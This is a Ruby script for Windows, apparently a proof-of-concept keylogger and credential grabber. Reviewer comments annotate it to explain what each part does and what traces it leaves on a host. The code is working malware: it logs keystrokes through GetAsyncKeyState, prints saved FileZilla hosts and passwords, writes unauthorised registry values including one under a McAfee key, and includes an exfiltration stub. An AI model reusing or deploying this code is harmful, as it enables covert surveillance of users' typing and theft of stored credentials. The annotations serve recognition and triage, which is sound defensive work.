messing around with rubys W32 api
#!usr/bin/ruby
# NOTE(review): this gist is a proof-of-concept Windows keylogger / credential
# grabber written against Ruby's Win32 bindings. The comments in this file describe
# what the visible code does and which host artefacts it leaves behind, so the
# script can be recognised and triaged.
require 'Win32API'        # raw DLL calls (user32!GetAsyncKeyState below)
require 'open-uri'        # on Ruby of this era, overrides Kernel#open so "http://..." strings perform HTTP GETs
require 'win32ole'        # COM automation (used here to launch Internet Explorer)
require 'win32/registry'  # HKLM / HKCU read and write access
# Counts savefile() calls; every 20th call triggers notify_me() (see savefile).
@count = 0
puts "APPDATA: #{ENV['APPDATA']}"
puts "Open a IE"
# Starts a visible Internet Explorer instance via COM and navigates it to the home
# page — a loud, user-observable side effect that is not part of the capture logic.
ie = WIN32OLE.new('InternetExplorer.Application')
ie.visible = true
ie.gohome
# Exfiltration stub, invoked by savefile() on every 20th captured character.
# With open-uri loaded, `open("http://www.google.com")` performs an HTTP GET and
# yields the response; that body is then written to a LOCAL file whose name is
# "test.html?" followed by the full contents of logs.txt. The captured keystrokes
# therefore only appear in a local file name, not in the outbound request, and the
# `text` argument is unused. On Windows `?` is not a legal file-name character, so
# the inner open presumably raises and the unhandled error would end the script —
# TODO confirm on a Windows Ruby build.
# Host artefacts: an outbound HTTP GET to www.google.com from the Ruby process, and
# a logs.txt read from the process's current working directory.
def notify_me(text)
  puts ":: Keylogger pushes data to Server"
  open("http://www.google.com") {|src|
    open("test.html?#{File.open('logs.txt').read}","wb") {|dst|
      dst.write(src.read)
    }
  }
end
# Appends one captured character to `filename` (capturar always passes "logs.txt",
# resolved against the process's current directory) and hands the same text to
# notify_me() whenever the running call count is a multiple of 20 — including the
# very first call, since @count starts at 0. The File object is not closed in this
# block, so the handle stays open until it is garbage-collected.
def savefile(filename,text)
  files = File.open(filename,'a')
  files.write text
  notify_me(text) if @count % 20 == 0
  @count +=1
end
# Keystroke-capture loop; never returns. Polls user32!GetAsyncKeyState for
# virtual-key codes 0x30-0x39 (digits 0-9) and 0x41-0x5A (letters A-Z) in a tight
# loop with no sleep. Per the Win32 API, the low bit of the return value is the
# "pressed since the previous call" flag; each hit appends `code.chr` to logs.txt
# via savefile(), so letters are always recorded in upper case and no symbols,
# case or modifier state are captured. Detection: a user-mode process calling
# GetAsyncKeyState continuously across the alphanumeric key range is a classic
# keylogger pattern, and this busy loop keeps one CPU core fully occupied.
def capturar
  nave = Win32API.new("user32","GetAsyncKeyState",["i"],"i")
  while 1
    for num1 in (0x30..0x39) #numbers
      if nave.call(num1) & 0x01 == 1
        savefile("logs.txt",num1.chr())
      end
    end
    for num2 in (0x41..0x5A) #letters
      if nave.call(num2) & 0x01 == 1
        savefile("logs.txt",num2.chr())
      end
    end
  end
end
print "Read some random Environment values: "
# These two Win32API wrappers are constructed but never called; the interpolation
# below prints the wrapper objects' inspect strings, not window handles.
GetDesktopWindow = Win32API.new("user32", "GetDesktopWindow", [], 'L')
GetActiveWindow = Win32API.new("user32", "GetActiveWindow", [], 'L')
puts "DesktopWindow: #{GetDesktopWindow} ActiveWindow: #{GetActiveWindow}"
puts "\nREAD ENV FROM REGISTRY\n"
# Read-only enumeration of the machine-wide environment block under HKLM.
# Win32::Registry#each yields (name, type, data); the block binds only the first
# two, so the printed "v" is presumably the value type rather than the data — verify.
a = Win32::Registry::HKEY_LOCAL_MACHINE.open "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", Win32::Registry::KEY_READ
a.each{|k, v| p "#{k} - #{v}"}
a.close
puts "\nREAD SOFTWARE INFO FROM REGISTRY\n"
keyname= "SOFTWARE"
# KEY_ALL_ACCESS is requested on HKLM\SOFTWARE merely to list subkeys — far more
# than the operation needs, and the open presumably fails with
# Win32::Registry::Error unless the process is elevated. each_key yields
# (subkey name, last-write time).
access = Win32::Registry::KEY_ALL_ACCESS
Win32::Registry::HKEY_LOCAL_MACHINE.open(keyname, access) do |reg|
  reg.each_key{|k, v| puts "#{k} - #{v}"}
end
puts "\nFUCK AROUND IN THE REGISTRY\n"
# Two registry writes under the current user's hive — durable host artefacts worth
# checking for during triage:
#   HKCU\Software\Microsoft\MediaPlayer      value "SomeKeyName" = "my new value"
#   HKCU\Software\McAfee\DesktopProtection   value "Haxored"     = "424242"
# `open` (not `create`) is used, so each write presumably fails unless the key
# already exists on the host — confirm.
puts "Write something to: HKEY_CURRENT_USER/Software/Microsoft/MediaPlayer"
Win32::Registry::HKEY_CURRENT_USER.open('Software\Microsoft\MediaPlayer', Win32::Registry::KEY_WRITE) do | reg |
  reg.write_s('SomeKeyName', 'my new value')
end
puts "Write something to: HKEY_CURRENT_USER/Software/McAfee/DesktopProtection"
Win32::Registry::HKEY_CURRENT_USER.open('Software\McAfee\DesktopProtection', Win32::Registry::KEY_WRITE) do | reg |
  reg.write_s('Haxored', '424242')
end
puts "\n\nREAD DATA FROM FIREFOX\n"
print "Detected profile path: "
# Picks the first Firefox profile directory under %APPDATA% (backslashes swapped
# for the glob) and reads urlclassifierkey3.txt from it. Only that one file is
# touched; no SQLite-backed data (history, bookmarks, logins) is read, as the
# message below says. If no profile exists, @path is nil and the read raises.
@path = Dir.glob("#{ENV['APPDATA']}\\Mozilla\\Firefox\\Profiles\\*".gsub('\\','/')).first
puts @path
puts "Dont read bookmarks, history, whatever now, because we would need the SQLite Library"
print "Read a file from there with some weird key in it: "
puts File.open("#{@path}/urlclassifierkey3.txt").read
# Credential harvesting: reads FileZilla's recentservers.xml from %APPDATA% and
# prints whatever sits in each <Host>/<Pass> pair, parsing the XML by plain string
# splitting. The bare `rescue` swallows any per-entry error, and the file is read
# without a block so the handle is not closed here. The output goes to stdout only.
File.open("#{ENV['APPDATA']}\\FileZilla\\recentservers.xml".gsub('\\','/')).read.split('<Server>').each do |c|
  next if c.nil? or !c.include? '<Host>'
  begin
    puts "Host: #{c.split('<Host>')[1].split('</Host>')[0]}"
    puts "Pass: #{c.split('<Pass>')[1].split('</Pass>')[0]}\n\n"
  rescue
  end
end
puts "\n\nStarting keylogger..."
# Blocks forever (see capturar); everything above runs once before capture begins.
capturar()